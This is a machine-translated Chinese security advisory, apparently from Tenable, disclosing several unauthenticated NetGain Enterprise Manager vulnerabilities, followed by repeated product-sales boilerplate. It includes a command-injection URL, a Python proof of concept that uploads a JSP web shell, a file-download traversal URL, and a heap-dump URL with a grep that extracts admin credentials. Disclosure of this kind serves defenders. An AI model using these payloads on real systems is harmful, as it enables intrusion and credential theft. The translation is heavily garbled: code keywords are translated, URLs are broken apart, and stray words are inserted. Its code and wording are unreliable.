脸谱网 Google + 推特 LinkedIn YouTube RSS 菜单 搜索 资源——博客 资源-网络研讨会 资源-报告 资源-事件 icons_066 icons_067 icons_068 icons_069 icons_070

(R1) NetGain企业管理多个远程漏洞

剧情简介

在研究一个命令注入漏洞上发布利用数据库站得住脚的发现,多个远程漏洞NetGain企业经理

cve - 2017 - 16608:不完整的命令注入补丁

NetGain试图修补Exploit-DB 877年7.2.586构建命令注入漏洞。补丁防止命令注入通过添加以下逻辑:

  1. 论证参数必须是一个有效的IP地址
  2. 命令必须开始”cmd / c平”或“ping - c 5

显而易见的问题是,攻击者可以添加额外的信息所需的命令之后文本。例如,攻击者可以创建一个新目录使用命令参数”cmd / c萍| | mkdir C:\Users\Public\fun | |”。下面的URL是一个完整的例子:

[目标]http://: 8081 / u / jsp /工具/ exec.jsp ?命令= cmd % 20% 2 fc % 20平% 20% 7 c % 7 c % 20 mkdir % 20 c % % 5 cusers % 5 cpublic % 3 5 cfun % 20% 7 c % 7 c参数= 127.0.0.1&async_output = nessus_56043399

cve - 2017 - 16610:未经身份验证的JSP上传和执行

未经过身份验证的远程攻击者可以上传任意文件到远程服务器通过一个HTTP POST请求/ u / jsp /备份/ upload_save_do.jsp。这是特别有用,因为NetGain EM写访问web根。这意味着攻击者可以上传一个JSP web层。以下概念验证上传一个web壳到Javascript目录。

导入请求从requests_toolbelt.multipart导入系统。编码器进口MultipartEncoder如果len (sys.argv) ! = 3:打印“用法:/ nsg_backup_upload。。py < server_address > <口>“打印”的例子:python。/ nsg_backup_upload。py 192.168.1.38 8081 sys.exit (0);jsp_shell =(“< % @页面导入= \”java.util。*, io。*\"%>\n' '' '
\n' '\n' '\n' '
\n' '
\n' '<%\n' 'if (request.getParameter(\"cmd\") != null) {\n' 'out.println(\"Command: \" + request.getParameter(\"cmd\") + \"
\");\n' 'Process p = Runtime.getRuntime().exec(request.getParameter(\"cmd\"));\n' 'OutputStream os = p.getOutputStream();\n' 'InputStream in = p.getInputStream();\n' 'DataInputStream dis = new DataInputStream(in);\n' 'String disr = dis.readLine();\n' 'while ( disr != null ) {\n' 'out.println(disr);\n' 'disr = dis.readLine();\n' '}\n' '}\n' '%>\n' '
Baidu
') multipart_data = MultipartEncoder( fields = { 'file': ('../u/js/shell.jsp', jsp_shell, 'text/plain') }) response = requests.post('http://' + sys.argv[1] + ':' + sys.argv[2] + '/u/jsp/backup/upload_save_do.jsp', data=multipart_data, headers={'Content-Type': multipart_data.content_type})

cve - 2017 - 16609:未经身份验证的文件下载

未经过身份验证的远程攻击者可以下载任何文件在远程服务器上通过一个HTTP GET请求(或文章)。下面的URL将下载C:\Windows\win.ini:

[目标]http://: 8081 / u / jsp /共同/ download.jsp ?文件名= win.ini&srcDir = C: \ Windows

cve - 2017 - 16607:未经身份验证的信息披露

NetGain EM允许一个未经身份验证的远程攻击者下载的所有进程的堆内存使用以下URL:

[目标]http://: 8081 / u / jsp /设置/ heapdumps.jsp ? dumpnow = 1

攻击者可以搜索记忆有趣的信息,如凭证。例如,站得住脚的发现转储的管理员的用户名和密码使用以下方法:

albinolobster@ubuntu: ~字符串。美元/ heapdump_2017_03_07_15_48_34。本| grep用户名=用户名=管理密码= thisismypassword % 21

cve - 2017 - 17406:不安全的反序列化Java对象

NetGain EM公开几个Java RMI注册在端口1800和1850。NetGain使用一些Java库,也知道是有用的在Java反序列化攻击包括bsh, Apache Commons集合,和Apache Commons类。站得住脚的确认一个未经身份验证的远程攻击者可能会使用反序列化攻击/ RMI实现远程代码执行。

解决方案

升级到NetGain 7.2.766企业经理或更高版本。

披露时间表

2017-03-08——发现问题
2017-03-17——提交给ZDI的问题
2017-04-11——ZDI接受漏洞
2017-12-13——ZDI发布警告
2018-01-30——站得住脚的释放咨询

交易报告内的所有信息提供了“是”,没有任何形式的保证,包括适销性的隐含保证和健身为特定目的,并没有保证的完整性、准确性、及时性。个人和组织负责评估任何实际或潜在的安全漏洞的影响。

站得住脚的非常重视产品安全。如果你认为你已经找到一个漏洞在一个我们的产品,我们要求您请与我们共同努力,快速解决它为了保护客户。站得住脚的相信迅速应对这样的报道,与研究人员保持沟通,并提供解决方案。

提交漏洞信息的更多细节,请参阅我们的漏洞报告指南页面。

如果你有问题或修正咨询,请电子邮件(电子邮件保护)

风险信息

成立咨询ID
- 2018 - 02
信贷

雅各布·贝恩斯

CVSSv2基地/时间的分数
7.5/6.2
CVSSv2向量
AV: N /交流:L /非盟:N / C: P / I: P / A: P)
更多关键字
zdi - 17 - 949
zdi - 17 - 950
zdi - 17 - 951
zdi - 17 - 952
zdi - 17 - 953
受影响的产品
不到7.2.766 NetGain企业管理器版本
风险因素

咨询时间

2018-01-30 - (R1)最初版本

站得住脚的脆弱性管理

以前Tenable.io


享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。

你站得住脚的脆弱性管理试验Lumin还包括成立,成立网络应用扫描和站得住脚的云安全。

站得住脚的脆弱性管理

以前Tenable.io

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。今天购买你的年度订阅。

65年资产

选择你的订阅选项:

1年
2275美元
2年
4436美元
3年
6483美元
现在购买
免费试 现在购买

尝试成立Nessus专业免费的

免费7天

站得住脚的Nessus是当今市场上最全面的漏洞扫描器。

新成立Nessus专家
现在可用

Nessus专家增添了更多的功能,包括外部攻击表面扫描,和添加域和扫描云基础设施的能力。点击这里尝试Nessus专家。

填写下面的表格继续Nessus Pro的审判。

买站得住脚的Nessus专业

站得住脚的Nessus是当今市场上最全面的漏洞扫描器。站得住脚的Nessus专业将帮助自动化漏洞扫描过程,节省时间在你的合规周期,让你与你的团队。

买一个多年的许可并保存。高级支持访问添加到手机、社区和聊天支持一天24小时,一年365天。

选择您的许可

买一个多年的许可并保存。

添加的支持和培训

免费试 现在购买
Tenable.io

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。

你站得住脚的脆弱性管理试验Lumin还包括成立,成立网络应用扫描和站得住脚的云安全。

Tenable.io

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。今天购买你的年度订阅。

65年资产

选择你的订阅选项:

1年
2275美元
2年
4436美元
3年
6483美元
现在购买
免费试 现在购买

尝试站得住脚的Web应用程序扫描

以前Tenable.ioWeb Application Scanning

享受完全访问我们的最新的web应用程序扫描提供专为现代应用程序的一部分的一个管理平台。安全扫描整个在线组合漏洞具有高精确度没有重体力工作或中断关键web应用程序。现在报名。

你站得住脚的Web应用程序扫描试验还包括站得住脚的脆弱性管理,成立Lumin站得住脚的云安全。

买站得住脚的Web应用程序扫描

以前Tenable.ioWeb Application Scanning

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。今天购买你的年度订阅。

5 fqdn

3578美元

现在购买

免费试 联系销售

尝试成立Lumin

可视化和探索你的风险管理,跟踪风险降低随着时间的推移和基准与站得住脚的Lumin你的同行。

你站得住脚的Lumin审判还包括站得住脚的脆弱性管理,站得住脚的Web应用程序扫描和站得住脚的云安全。

买站得住脚的Lumin

联系销售代表如何站得住脚的Lumin可以帮助你了解你的整个组织和管理网络的风险。

免费试 联系销售

尝试站得住脚的云安全

以前Tenable.cs

享受完全访问检测和修复云基础设施配置错误和查看运行时的漏洞。现在注册你的免费试用。了解更多关于审判过程请点击这里。

你站得住脚的云安全试验还包括站得住脚的脆弱性管理,成立Lumin和站得住脚的Web应用程序扫描。

联系销售代表购买站得住脚的云安全

联系销售代表来了解更多关于站得住脚的云安全,看是多么容易机载云账户和获得可见性都几分钟内云配置错误和漏洞。

免费试 现在购买

尝试成立Nessus专家免费

免费7天

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

已经成立Nessus专业吗?
升级到Nessus专家免费7天。

买站得住脚的Nessus专家

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

选择您的许可

买一个多年的执照和存更多的钱。

添加的支持和培训

免费试 现在购买

尝试Nessus专家免费

免费7天

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

已经有了Nessus专业?
升级到Nessus专家免费7天。

买站得住脚的Nessus专家

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

选择您的许可

买一个多年的执照和存更多的钱。

添加的支持和培训

Baidu
map